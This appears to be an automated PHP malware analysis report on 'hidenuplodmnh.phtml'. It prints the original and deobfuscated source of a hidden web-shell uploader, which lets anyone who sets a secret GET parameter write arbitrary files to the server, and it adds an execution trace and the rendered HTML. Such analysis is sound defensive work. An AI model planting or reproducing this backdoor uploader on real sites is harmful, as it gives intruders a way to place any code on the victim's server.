hidenuplodmnh.phtml

md5: 53a5417532e74942175f0809398174b1

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Files
move_uploaded_file (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_GET (Deobfuscated, Original)
_POST (Deobfuscated, Original)

Title
Uploader MnH-Blog (Deobfuscated, Original)

URLs
http://www.w3.org/1999/xhtml (Deobfuscated, Original)
https://blog.rootshell.be/wp-content/uploads/2012/02/blackhat-nl.png (Deobfuscated, Original)
https://fonts.googleapis.com/css?family=Trade+Winds (Deobfuscated, Original)

Deobfuscated PHP code
<?php

echo "\n<style>\n.none{\n\tdisplay:none;\n}\n</style>\n<form method=\"get\">\n<input type=\"submit\" name=\"x\" class=\"none\">\n</form>";
if ($_GET['x']) {
    if (isset($_POST['btn'])) {
        $nama = $_FILES['upl']['name'];
        $lokasi = $_FILES['upl']['tmp_name'];
        $folder = "";
        if (move_uploaded_file($lokasi, $folder . $nama)) {
            echo "berhasil upload file :)";
        } else {
            echo "gagal upload file :";
        }
    }
    echo "\n<!-- Uploader Script By Codename -->\n<!DOCTYPE html>\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\n<meta name=\"keywords\" content=\"Codename\">\n<meta name=\"viewport\" content=\"width=width-device,initial-scale=1\">\n<link rel=\"icon\" href=\"https://blog.rootshell.be/wp-content/uploads/2012/02/blackhat-nl.png\">\n<title>Uploader MnH-Blog</title>\n</head>\n<body>\n <link href=\"https://fonts.googleapis.com/css?family=Trade+Winds\" rel=\"stylesheet\" type=\"text/css\"/>\n<center>\n<br><br><br><br><br><br><br>\n<h1>#~Magelang1337.com~#</h1>\n\n<fieldset><legend> Upload Here </legend>\n<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">\n<input type=\"file\" name=\"upl\"  />\n<button type=\"submit\" name=\"btn\" id=\"btn\">Upload !</button>\n</form></div>\n</fieldset>\n\n<!-- INI CSS :) -->\n<style>\nbody{\n\tbackground:#000;\ntext-align: center;\ncolor:#00FF6D;\n}\n#kolom{\ncolor:#00FF6D;\nbackground: #555;\nborder:1px solid #71FF00;\nWidth:35%;\nHeight:80px;\nfont-family: Trade Winds;\n\n}\n#btn{\ncolor:#000;\nbackground: #00ff6d;\nborder: 0;\nwidth:30%;\nheight:30px;\n}\n#btn:hover{\n\ttransition-duration:0.4s;\n-o-transition-duration:0.4s;\n-moz-transition-duration:0.4s;\n-webkit-transition-duration:0.4s;\nbackground:#000;\nborder:1px solid #00ff7d;\ncolor:#81ff00;\n}\nh1{\nfont-family:Trade Winds;\ncolor:#333;\ntext-shadow:0pt 0pt 10pt #00FF5D,0pt 0pt 20pt #71FF00,0pt 0pt 30pt #00FF6D;\n}\n\n</style>";
}
Execution traces
data/traces/53a5417532e74942175f0809398174b1_trace-1676245349.7038.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:42:55.601597]
1	0	1	0.000197	393608
1	3	0	0.000271	397456	{main}	1		/var/www/html/uploads/hidenuplodmnh.phtml	0	0
1	3	1	0.000315	397456
			0.000350	314296
TRACE END   [2023-02-12 21:42:55.601794]

Generated HTML code
<html><head><style>
.none{
	display:none;
}
</style>
</head><body><form method="get">
<input type="submit" name="x" class="none">
</form></body></html>
Original PHP code
<?php

echo'
<style>
.none{
	display:none;
}
</style>
<form method="get">
<input type="submit" name="x" class="none">
</form>';
if($_GET['x']){
if(isset($_POST['btn']))
{
	$nama= $_FILES['upl']['name'];
    $lokasi = $_FILES['upl']['tmp_name'];
	$folder="";
	if(move_uploaded_file($lokasi,$folder.$nama))
	{
echo'berhasil upload file :)';	}else{
		echo'gagal upload file :';
	}
}
echo'
<!-- Uploader Script By Codename -->
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="Codename">
<meta name="viewport" content="width=width-device,initial-scale=1">
<link rel="icon" href="https://blog.rootshell.be/wp-content/uploads/2012/02/blackhat-nl.png">
<title>Uploader MnH-Blog</title>
</head>
<body>
 <link href="https://fonts.googleapis.com/css?family=Trade+Winds" rel="stylesheet" type="text/css"/>
<center>
<br><br><br><br><br><br><br>
<h1>#~Magelang1337.com~#</h1>

<fieldset><legend> Upload Here </legend>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="upl"  />
<button type="submit" name="btn" id="btn">Upload !</button>
</form></div>
</fieldset>

<!-- INI CSS :) -->
<style>
body{
	background:#000;
text-align: center;
color:#00FF6D;
}
#kolom{
color:#00FF6D;
background: #555;
border:1px solid #71FF00;
Width:35%;
Height:80px;
font-family: Trade Winds;

}
#btn{
color:#000;
background: #00ff6d;
border: 0;
width:30%;
height:30px;
}
#btn:hover{
	transition-duration:0.4s;
-o-transition-duration:0.4s;
-moz-transition-duration:0.4s;
-webkit-transition-duration:0.4s;
background:#000;
border:1px solid #00ff7d;
color:#81ff00;
}
h1{
font-family:Trade Winds;
color:#333;
text-shadow:0pt 0pt 10pt #00FF5D,0pt 0pt 20pt #71FF00,0pt 0pt 30pt #00FF6D;
}

</style>';
}

?>
PHP Malware Analysis

hidenuplodmnh.phtml

md5: 53a5417532e74942175f0809398174b1

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
